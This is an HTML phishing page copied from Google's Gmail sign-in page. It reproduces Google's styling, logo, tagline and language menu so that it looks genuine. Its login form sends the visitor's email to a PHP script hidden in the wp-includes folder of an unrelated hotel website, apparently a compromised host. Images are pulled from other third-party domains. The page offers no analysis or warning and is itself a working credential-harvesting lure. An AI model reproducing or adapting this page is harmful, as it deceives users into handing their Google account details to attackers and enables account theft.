<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
  
  <meta charset="utf-8">

  
  <meta content="width=300, initial-scale=1" name="viewport">

  
  <meta name="description" content="Gmail is email that's intuitive, efficient, and useful. 15 GB of storage, less spam, and mobile access.">
  <title>Gmail</title>

  
  
  <style>
html, body {
font-family: Arial, sans-serif;
background: #fff;
margin: 0;
padding: 0;
border: 0;
position: absolute;
height: 100%;
min-width: 100%;
font-size: 13px;
color: #404040;
direction: ltr;
-webkit-text-size-adjust: none;
}
button,
input[type=button],
input[type=submit] {
font-family: Arial, sans-serif;
font-size: 13px;
}
a,
a:hover,
a:visited {
color: #427fed;
cursor: pointer;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
h1 {
font-size: 20px;
color: #262626;
margin: 0 0 15px;
font-weight: normal;
}
h2 {
font-size: 14px;
color: #262626;
margin: 0 0 15px;
font-weight: bold;
}
input[type=email],
input[type=number],
input[type=password],
input[type=tel],
input[type=text],
input[type=url] {
-moz-appearance: none;
-webkit-appearance: none;
appearance: none;
display: inline-block;
height: 36px;
padding: 0 8px;
line-height: 36px;
margin: 0;
background: #fff;
border: 1px solid #d9d9d9;
border-top: 1px solid #c0c0c0;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
font-size: 15px;
color: #404040;
}
input[type=email]:hover,
input[type=number]:hover,
input[type=password]:hover,
input[type=tel]:hover,
input[type=text]:hover,
input[type=url]:hover {
border: 1px solid #b9b9b9;
border-top: 1px solid #a0a0a0;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
input[type=email]:focus,
input[type=number]:focus,
input[type=password]:focus,
input[type=tel]:focus,
input[type=text]:focus,
input[type=url]:focus {
outline: none;
border: 1px solid #4d90fe;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
input[type=checkbox],
input[type=radio] {
-webkit-appearance: none;
display: inline-block;
width: 13px;
height: 13px;
margin: 0;
cursor: pointer;
vertical-align: bottom;
background: #fff;
border: 1px solid #c6c6c6;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
position: relative;
border: 0;
width: 16px;
height: 16px;
box-sizing: content-box;
background: none;
}
input[type=checkbox]:active,
input[type=radio]:active {
background: #ebebeb;
}
input[type=checkbox]:hover {
border-color: #c6c6c6;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
input[type=radio] {
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
width: 15px;
height: 15px;
}
input[type=checkbox]:checked,
input[type=radio]:checked {
background: #fff;
}
input[type=radio]:checked::after {
content: '';
display: block;
position: relative;
top: 3px;
left: 3px;
width: 7px;
height: 7px;
background: #666;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
}
input[type=checkbox]:checked::after {
content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);
display: block;
position: absolute;
top: -6px;
left: -5px;
}
input[type=checkbox]:focus {
outline: none;
border-color: #4d90fe;
}
.stacked-label {
display: block;
font-weight: bold;
margin: .5em 0;
}
.hidden-label {
position: absolute !important;
clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
clip: rect(1px, 1px, 1px, 1px);
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
}
input[type=checkbox].form-error,
input[type=email].form-error,
input[type=number].form-error,
input[type=password].form-error,
input[type=text].form-error,
input[type=tel].form-error,
input[type=url].form-error {
border: 1px solid #dd4b39;
}
.error-msg {
margin: .5em 0;
display: block;
color: #dd4b39;
line-height: 17px;
}
.help-link {
background: #dd4b39;
padding: 0 5px;
color: #fff;
font-weight: bold;
display: inline-block;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
text-decoration: none;
position: relative;
top: 0px;
}
.help-link:visited {
color: #fff;
}
.help-link:hover {
color: #fff;
background: #c03523;
text-decoration: none;
}
.help-link:active {
opacity: 1;
background: #ae2817;
}
.wrapper {
position: relative;
min-height: 100%;
}
.content {
padding: 0 44px;
}
.main {
padding-bottom: 100px;
}
/* For modern browsers */
.clearfix:before,
.clearfix:after {
content: "";
display: table;
}
.clearfix:after {
clear: both;
}
/* For IE 6/7 (trigger hasLayout) */
.clearfix {
zoom:1;
}
.google-header-bar {
height: 71px;
border-bottom: 1px solid #e5e5e5;
overflow: hidden;
}
.header .logo {
margin: 17px 0 0;
float: left;
height: 38px;
width: 116px;
}
.header .secondary-link {
margin: 28px 0 0;
float: right;
}
.header .secondary-link a {
font-weight: normal;
}
.google-header-bar.centered {
border: 0;
height: 108px;
}
.google-header-bar.centered .header .logo {
float: none;
margin: 40px auto 30px;
display: block;
}
.google-header-bar.centered .header .secondary-link {
display: none
}
.google-footer-bar {
position: absolute;
bottom: 0;
height: 35px;
width: 100%;
border-top: 1px solid #e5e5e5;
overflow: hidden;
}
.footer {
padding-top: 7px;
font-size: .85em;
white-space: nowrap;
line-height: 0;
}
.footer ul {
float: left;
max-width: 80%;
padding: 0;
}
.footer ul li {
color: #737373;
display: inline;
padding: 0;
padding-right: 1.5em;
}
.footer a {
color: #737373;
}
.lang-chooser-wrap {
float: right;
display: inline;
}
.lang-chooser-wrap img {
vertical-align: top;
}
.lang-chooser {
font-size: 13px;
height: 24px;
line-height: 24px;
}
.lang-chooser option {
font-size: 13px;
line-height: 24px;
}
.hidden {
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
display: none !important;
}
.banner {
text-align: center;
}
.card {
background-color: #f7f7f7;
padding: 20px 25px 30px;
margin: 0 auto 25px;
width: 304px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
.card > *:first-child {
margin-top: 0;
}
.rc-button,
.rc-button:visited {
display: inline-block;
min-width: 46px;
text-align: center;
color: #444;
font-size: 14px;
font-weight: 700;
height: 36px;
padding: 0 8px;
line-height: 36px;
-moz-border-radius: 3px;
-webkit-border-radius: 3px;
border-radius: 3px;
-o-transition: all 0.218s;
-moz-transition: all 0.218s;
-webkit-transition: all 0.218s;
transition: all 0.218s;
border: 1px solid #dcdcdc;
background-color: #f5f5f5;
background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
-o-transition: none;
-moz-user-select: none;
-webkit-user-select: none;
user-select: none;
cursor: default;
}
.card .rc-button {
width: 100%;
padding: 0;
}
.rc-button:hover {
border: 1px solid #c6c6c6;
color: #333;
text-decoration: none;
-o-transition: all 0.0s;
-moz-transition: all 0.0s;
-webkit-transition: all 0.0s;
transition: all 0.0s;
background-color: #f8f8f8;
background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
-moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
box-shadow: 0 1px 1px rgba(0,0,0,0.1);
}
.rc-button:active {
background-color: #f6f6f6;
background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
-moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
box-shadow: 0 1px 2px rgba(0,0,0,0.1);
}
.rc-button-submit,
.rc-button-submit:visited {
border: 1px solid #3079ed;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #4d90fe;
background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);
background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);
background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);
background-image: -o-linear-gradient(top,#4d90fe,#4787ed);
background-image: linear-gradient(top,#4d90fe,#4787ed);
}
.rc-button-submit:hover {
border: 1px solid #2f5bb7;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
}
.rc-button-submit:active {
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
.rc-button-red,
.rc-button-red:visited {
border: 1px solid transparent;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #d14836;
background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);
background-image: -moz-linear-gradient(top,#dd4b39,#d14836);
background-image: -ms-linear-gradient(top,#dd4b39,#d14836);
background-image: -o-linear-gradient(top,#dd4b39,#d14836);
background-image: linear-gradient(top,#dd4b39,#d14836);
}
.rc-button-red:hover {
border: 1px solid #b0281a;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #c53727;
background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);
background-image: -moz-linear-gradient(top,#dd4b39,#c53727);
background-image: -ms-linear-gradient(top,#dd4b39,#c53727);
background-image: -o-linear-gradient(top,#dd4b39,#c53727);
background-image: linear-gradient(top,#dd4b39,#c53727);
}
.rc-button-red:active {
border: 1px solid #992a1b;
background-color: #b0281a;
background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);
background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);
background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);
background-image: -o-linear-gradient(top,#dd4b39,#b0281a);
background-image: linear-gradient(top,#dd4b39,#b0281a);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
.secondary-actions {
text-align: center;
}
  </style>
  
  <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.google-header-bar.centered {
height: 83px;
}
.google-header-bar.centered .header .logo {
margin: 25px auto 20px;
}
.card {
margin-bottom: 20px;
}
  </style>
  
  <style media="screen and (max-width: 580px)">
html, body {
font-size: 14px;
}
.google-header-bar.centered {
height: 73px;
}
.google-header-bar.centered .header .logo {
margin: 20px auto 15px;
}
.content {
padding-left: 10px;
padding-right: 10px;
}
.hidden-small {
display: none;
}
.card {
padding: 20px 15px 30px;
width: 270px;
}
.footer ul li {
padding-right: 1em;
}
.lang-chooser-wrap {
display: none;
}
  </style>
  
  <style>
pre.debug {
font-family: monospace;
position: absolute;
left: 0;
margin: 0;
padding: 1.5em;
font-size: 13px;
background: #f1f1f1;
border-top: 1px solid #e5e5e5;
direction: ltr;
white-space: pre-wrap;
width: 90%;
overflow: hidden;
}
  </style>
  
  <link href="//fonts.googleapis.com/css?family=Open+Sans:300,400&amp;lang=en" rel="stylesheet" type="text/css">

  
  <style>
h1, h2 {
-webkit-animation-duration: 0.1s;
-webkit-animation-name: fontfix;
-webkit-animation-iteration-count: 1;
-webkit-animation-timing-function: linear;
-webkit-animation-delay: 0;
}
@-webkit-keyframes fontfix {
from {
opacity: 1;
}
to {
opacity: 1;
}
}
  </style>
  
  <style>
.banner {
text-align: center;
}
.banner h1 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 42px;
font-weight: 300;
margin-top: 0;
margin-bottom: 20px;
}
.banner h2 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 18px;
font-weight: 400;
margin-bottom: 20px;
}
.signin-card {
width: 274px;
padding: 40px 40px;
}
.signin-card .profile-img {
width: 96px;
height: 96px;
margin: 0 auto 10px;
display: block;
-moz-border-radius: 50%;
-webkit-border-radius: 50%;
border-radius: 50%;
}
.signin-card .profile-name {
font-size: 16px;
font-weight: bold;
text-align: center;
margin: 10px 0 0;
min-height: 1em;
}
.signin-card input[type=email],
.signin-card input[type=password],
.signin-card input[type=text],
.signin-card input[type=submit] {
width: 100%;
display: block;
margin-bottom: 10px;
z-index: 1;
position: relative;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.signin-card #Email,
.signin-card #Passwd,
.signin-card .captcha {
direction: ltr;
height: 44px;
font-size: 16px;
}
.signin-card #Email + .stacked-label {
margin-top: 15px;
}
.signin-card #reauthEmail {
display: block;
margin-bottom: 10px;
line-height: 36px;
padding: 0 8px;
font-size: 15px;
color: #404040;
line-height: 2;
margin-bottom: 10px;
font-size: 14px;
text-align: center;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.one-google p {
margin: 0 0 10px;
color: #555;
font-size: 14px;
text-align: center;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 60px;
}
.one-google img {
display: block;
width: 210px;
height: 17px;
margin: 10px auto;
}
  </style>
  
  <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.banner h1 {
font-size: 38px;
margin-bottom: 15px;
}
.banner h2 {
margin-bottom: 15px;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 30px;
}
.signin-card #Email {
margin-bottom: 0;
}
.signin-card #Passwd {
margin-top: -1px;
}
.signin-card #Email.form-error,
.signin-card #Passwd.form-error {
z-index: 2;
}
.signin-card #Email:hover,
.signin-card #Email:focus,
.signin-card #Passwd:hover,
.signin-card #Passwd:focus {
z-index: 3;
}
  </style>
  
  <style media="screen and (max-width: 580px)">
.banner h1 {
font-size: 22px;
margin-bottom: 15px;
}
.signin-card {
width: 260px;
padding: 20px 20px;
margin: 0 auto 20px;
}
.signin-card .profile-img {
width: 72px;
height: 72px;
-moz-border-radius: 72px;
-webkit-border-radius: 72px;
border-radius: 72px;
}
  </style>
  
  <style>
.jfk-tooltip {
background-color: #fff;
border: 1px solid;
color: #737373;
font-size: 12px;
position: absolute;
z-index: 800 !important;
border-color: #bbb #bbb #a8a8a8;
padding: 16px;
width: 250px;
}
.jfk-tooltip h3 {
color: #555;
font-size: 12px;
margin: 0 0 .5em;
}
.jfk-tooltip-content p:last-child {
margin-bottom: 0;
}
.jfk-tooltip-arrow {
position: absolute;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,
.jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
display: block;
height: 0;
position: absolute;
width: 0;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {
border: 9px solid;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
border: 8px solid;
}
.jfk-tooltip-arrowdown {
bottom: 0;
}
.jfk-tooltip-arrowup {
top: -9px;
}
.jfk-tooltip-arrowleft {
left: -9px;
top: 30px;
}
.jfk-tooltip-arrowright {
right: 0;
top: 30px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
border-color: #bbb transparent;
left: -9px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
border-color: #a8a8a8 transparent;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
border-color: #fff transparent;
left: -8px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
border-bottom-width: 0;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {
border-bottom-width: 0;
}
.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
border-top-width: 0;
}
.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
border-top-width: 0;
top: 1px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
border-color: transparent #bbb;
top: -9px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
border-color:transparent #fff;
top:-8px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {
border-left-width: 0;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {
border-left-width: 0;
left: 1px;
}
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
border-right-width: 0;
}
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
border-right-width: 0;
}
.jfk-tooltip-closebtn {
background: url("//ssl.gstatic.com/ui/v1/icons/common/x_8px.png") no-repeat;
border: 1px solid transparent;
height: 21px;
opacity: .4;
outline: 0;
position: absolute;
right: 2px;
top: 2px;
width: 21px;
}
.jfk-tooltip-closebtn:focus,
.jfk-tooltip-closebtn:hover {
opacity: .8;
cursor: pointer;
}
.jfk-tooltip-closebtn:focus {
border-color: #4d90fe;
}
  </style>
  
  <style media="screen and (max-width: 580px)">
.jfk-tooltip {
display: none;
}
  </style>
  
  <style>
.need-help-reverse {
float: right;
}
.remember .bubble-wrap {
position: absolute;
padding-top: 3px;
-o-transition: opacity .218s ease-in .218s;
-moz-transition: opacity .218s ease-in .218s;
-webkit-transition: opacity .218s ease-in .218s;
transition: opacity .218s ease-in .218s;
left: -999em;
opacity: 0;
width: 314px;
margin-left: -20px;
}
.remember:hover .bubble-wrap,
.remember input:focus ~ .bubble-wrap,
.remember .bubble-wrap:hover,
.remember .bubble-wrap:focus {
opacity: 1;
left: inherit;
}
.bubble-pointer {
border-left: 10px solid transparent;
border-right: 10px solid transparent;
border-bottom: 10px solid #fff;
width: 0;
height: 0;
margin-left: 17px;
}
.bubble {
background-color: #fff;
padding: 15px;
margin-top: -1px;
font-size: 11px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
#stay-signed-in {
float: left;
}
#stay-signed-in-tooltip {
left: auto;
margin-left: -20px;
padding-top: 3px;
position: absolute;
top: 0;
visibility: hidden;
width: 314px;
z-index: 1;
}
.dasher-tooltip {
position: absolute;
left: 50%;
top: 380px;
margin-left: 150px;
}
.dasher-tooltip .tooltip-pointer {
margin-top: 15px;
}
.dasher-tooltip p {
margin-top: 0;
}
.dasher-tooltip p span {
display: block;
}
  </style>
  
  <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.dasher-tooltip {
top: 340px;
}
  </style>
  
  <script src="/stat/dspixel.js?ab=uc&amp;cl=chrome://editor/content/blanks/strict.html&amp;bcn=Mozilla&amp;bn=Netscape&amp;bv=5.0%20%28Windows;%20en-US%29&amp;ce=true&amp;bl=en-US&amp;np=Win32&amp;sw=1024&amp;sh=768&amp;r=0.29111339253933755"></script>
  
  <script src="/stat/dspixel.js?ab=uc&amp;cl=chrome://editor/content/blanks/strict.html&amp;bcn=Mozilla&amp;bn=Netscape&amp;bv=5.0%20%28Windows;%20en-US%29&amp;ce=true&amp;bl=en-US&amp;np=Win32&amp;sw=1024&amp;sh=600&amp;r=0.6521359464283917"></script>
  
  <script src="/stat/dspixel.js?ab=uc&amp;cl=chrome://editor/content/blanks/strict.html&amp;bcn=Mozilla&amp;bn=Netscape&amp;bv=5.0%20%28Windows;%20en-US%29&amp;ce=true&amp;bl=en-US&amp;np=Win32&amp;sw=1366&amp;sh=768&amp;r=0.6229835584636559"></script>
  
  <script src="/stat/dspixel.js?ab=uc&amp;cl=chrome://editor/content/blanks/strict.html&amp;bcn=Mozilla&amp;bn=Netscape&amp;bv=5.0%20%28Windows;%20en-US%29&amp;ce=true&amp;bl=en-US&amp;np=Win32&amp;sw=1366&amp;sh=768&amp;r=0.6579395322971213"></script>
  
  <link rel="icon" type="image/ico" href="https://s31.postimg.org/nb0ho0dvv/image.png/favicon.ico">

</head><body>
<div class="wrapper">
<div class="google-header-bar centered">
<div class="header content clearfix"> <img style="width: 153px; height: 50px;" alt="Google" class="logo" src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"> </div>
</div>
<div class="main content clearfix">
<div class="banner">
<h1>One account. All of Google.
</h1>
<h2 class="hidden-small"> Sign in to continue to Gmail </h2>
</div>
<div class="card signin-card clearfix">
<div style="text-align: center;"> <img style="width: 120px; height: 120px;" class="profile-img" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMAAAADACAAAAAB3tzPbAAACOUlEQVR4Ae3aCQrrIBRG4e5/Tz+CBAlIkIAECUjoSt48z/GZeAvnrMCvc6/38XzxAAAAYC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAMCAAAAAAAAAAAAAAAAPsagz4V4rq/FmCLTj/k4vYqgCN5/TKfjlcAJKff5pJ5QPH6Y77YBiz6a4thQJ30D03VKmB3+qfcbhOwO+l+waP/+VsEBgDV6USumgNMOtVkDbDoZIstQNHpiimA1+m8JUBSQ8kO4HBqyB1mAElNJTMAr6a8FcCmxjYjgKjGohGAU2POBmBXc7sJwKrmVhOAqOaiCUBQc8EEQO0JwPMB4ADASwhAe3yR8VPiP3/M8XOaPzQd/lLyp56xSuvnUGK0yHC313idCw6umNov+bhm5aK7fdWAZQ/WbdoXnlg5Y+mvfe2SxVdWj20FAAAAAAAAAAAAwFQAAJSS0hwmfVMIc0qlmAfsOQWvP+RDyrtNQM1L0D8WllxNAWqOXifzMVcbgG3xaswv22jAFp3a6zFteYw8fQ9DM6Amr275VG8GlFmdm8uNgDzpgqZ8EyB7XZTPNwDKpAubysWAOuvi5nolYHW6PLdeBjiCbikc1wCK0025cgUg68Zyf0DUrcXegKibi30Bq25v7QnYNKCtH+BwGpA7ugFmDWnuBSgaVOkECBpU6AOoGlbtAlg1rLULIGhYoQvAaViuC0AD6wE4Xh1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADA194CuqC6onikxXwAAAAASUVORK5CYII=" alt=""></div>
<form action="http://www.shwesaneainhotel.com/backup/home/wp-includes/mo.php" novalidate="novalidate" method="post" id="gaia_loginform">&nbsp;&nbsp;&nbsp; <input id="Email" name="email" placeholder="Email" value="" spellcheck="false" class="" type="email">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br>
  <input id="signIn" name="signIn" class="rc-button rc-button-submit" value="Next" type="submit"> <span class="need-help-reverse">Need
help? </span> </form>
</div>
<div class="one-google">
<div class="one-google">
<div class="one-google">
<p class="create-account"> <a id="link-signup" href="https://accounts.google.com/SignUp?continue=https%3A%2F%2Faccounts.google.com%2FManageAccount">Create
an account </a> </p>
<p class="tagline"> One Google Account for everything Google </p>
<img src="http://www.millwallcu.com/files/wlogostrip_230x17_1x.png" alt="" height="17" width="210"> </div>
</div>
</div>
</div>
<div class="google-footer-bar">
<div class="footer content clearfix">
<ul id="footer-list">
  <li> Google </li>
  <li> Privacy &amp; Terms </li>
  <li> Help </li>
</ul>
<div id="lang-vis-control" style="display: inline;">
<span id="lang-chooser-wrap" class="lang-chooser-wrap"><label for="lang-chooser"><img src="//ssl.gstatic.com/images/icons/ui/common/universal_language_settings-21.png" alt="Change language"></label>
<select id="lang-chooser" class="lang-chooser" name="lang-chooser">
<option value="af"> &#8234;Afrikaans&#8236; </option>
<option value="az"> &#8234;az&#601;rbaycan&#8236; </option>
<option value="in"> &#8234;Bahasa Indonesia&#8236; </option>
<option value="ms"> &#8234;Bahasa Melayu&#8236; </option>
<option value="ca"> &#8234;catal&#65533;&#8236; </option>
<option value="cs"> &#8234;&#268;e&#353;tina&#8236; </option>
<option value="da"> &#8234;Dansk&#8236; </option>
<option value="de"> &#8234;Deutsch&#8236; </option>
<option value="et"> &#8234;eesti&#8236; </option>
<option value="en-GB"> &#8234;English (United Kingdom)&#8236; </option>
<option value="en" selected="selected"> &#8234;English
(United States)&#8236; </option>
<option value="es"> &#8234;Espa&#65533;ol (Espa&#65533;a)&#8236; </option>
<option value="es-419"> &#8234;Espa&#65533;ol (Latinoam&#65533;rica)&#8236; </option>
<option value="eu"> &#8234;euskara&#8236; </option>
<option value="fil"> &#8234;Filipino&#8236; </option>
<option value="fr-CA"> &#8234;Fran&#65533;ais (Canada)&#8236; </option>
<option value="fr"> &#8234;Fran&#65533;ais (France)&#8236; </option>
<option value="gl"> &#8234;galego&#8236; </option>
<option value="hr"> &#8234;Hrvatski&#8236; </option>
<option value="zu"> &#8234;isiZulu&#8236; </option>
<option value="is"> &#8234;&#65533;slenska&#8236; </option>
<option value="it"> &#8234;Italiano&#8236; </option>
<option value="sw"> &#8234;Kiswahili&#8236; </option>
<option value="lv"> &#8234;latvie&#353;u&#8236; </option>
<option value="lt"> &#8234;lietuvi&#371;&#8236; </option>
<option value="hu"> &#8234;magyar&#8236; </option>
<option value="nl"> &#8234;Nederlands&#8236; </option>
<option value="no"> &#8234;norsk&#8236; </option>
<option value="pl"> &#8234;polski&#8236; </option>
<option value="pt"> &#8234;Portugu&#65533;s&#8236; </option>
<option value="pt-BR"> &#8234;Portugu&#65533;s (Brasil)&#8236; </option>
<option value="pt-PT"> &#8234;Portugu&#65533;s (Portugal)&#8236; </option>
<option value="ro"> &#8234;rom&#65533;n&#259;&#8236; </option>
<option value="sk"> &#8234;Sloven&#269;ina&#8236; </option>
<option value="sl"> &#8234;sloven&#353;&#269;ina&#8236; </option>
<option value="fi"> &#8234;Suomi&#8236; </option>
<option value="sv"> &#8234;Svenska&#8236; </option>
<option value="vi"> &#8234;Ti&#7871;ng Vi&#7879;t&#8236; </option>
<option value="tr"> &#8234;T&#65533;rk&#65533;e&#8236; </option>
<option value="el"> &#8234;&#917;&#955;&#955;&#951;&#957;&#953;&#954;&#940;&#8236; </option>
<option value="bg"> &#8234;&#1073;&#1098;&#1083;&#1075;&#1072;&#1088;&#1089;&#1082;&#1080;&#8236; </option>
<option value="mn"> &#8234;&#1084;&#1086;&#1085;&#1075;&#1086;&#1083;&#8236; </option>
<option value="ru"> &#8234;&#1056;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081;&#8236; </option>
<option value="sr"> &#8234;&#1057;&#1088;&#1087;&#1089;&#1082;&#1080;&#8236; </option>
<option value="uk"> &#8234;&#1059;&#1082;&#1088;&#1072;&#1111;&#1085;&#1089;&#1100;&#1082;&#1072;&#8236; </option>
<option value="ka"> &#8234;&#4325;&#4304;&#4320;&#4311;&#4323;&#4314;&#4312;&#8236; </option>
<option value="hy"> &#8234;&#1392;&#1377;&#1397;&#1381;&#1408;&#1381;&#1398;&#8236; </option>
<option value="iw"> &#8235;&#1506;&#1489;&#1512;&#1497;&#1514;&#8236;&#8206; </option>
<option value="ur"> &#8235;&#1575;&#1585;&#1583;&#1608;&#8236;&#8206; </option>
<option value="ar"> &#8235;&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577;&#8236;&#8206; </option>
<option value="fa"> &#8235;&#1601;&#1575;&#1585;&#1587;&#1740;&#8236;&#8206; </option>
<option value="am"> &#8234;&#4768;&#4635;&#4653;&#4763;&#8236; </option>
<option value="ne"> &#8234;&#2344;&#2375;&#2346;&#2366;&#2354;&#2368;&#8236; </option>
<option value="mr"> &#8234;&#2350;&#2352;&#2366;&#2336;&#2368;&#8236; </option>
<option value="hi"> &#8234;&#2361;&#2367;&#2344;&#2381;&#2342;&#2368;&#8236; </option>
<option value="bn"> &#8234;&#2476;&#2494;&#2434;&#2482;&#2494;&#8236; </option>
<option value="gu"> &#8234;&#2711;&#2753;&#2716;&#2736;&#2750;&#2724;&#2752;&#8236; </option>
<option value="ta"> &#8234;&#2980;&#2990;&#3007;&#2996;&#3021;&#8236; </option>
<option value="te"> &#8234;&#3108;&#3142;&#3122;&#3137;&#3095;&#3137;&#8236; </option>
<option value="kn"> &#8234;&#3221;&#3240;&#3277;&#3240;&#3233;&#8236; </option>
<option value="ml"> &#8234;&#3374;&#3378;&#3375;&#3390;&#3379;&#3330;&#8236; </option>
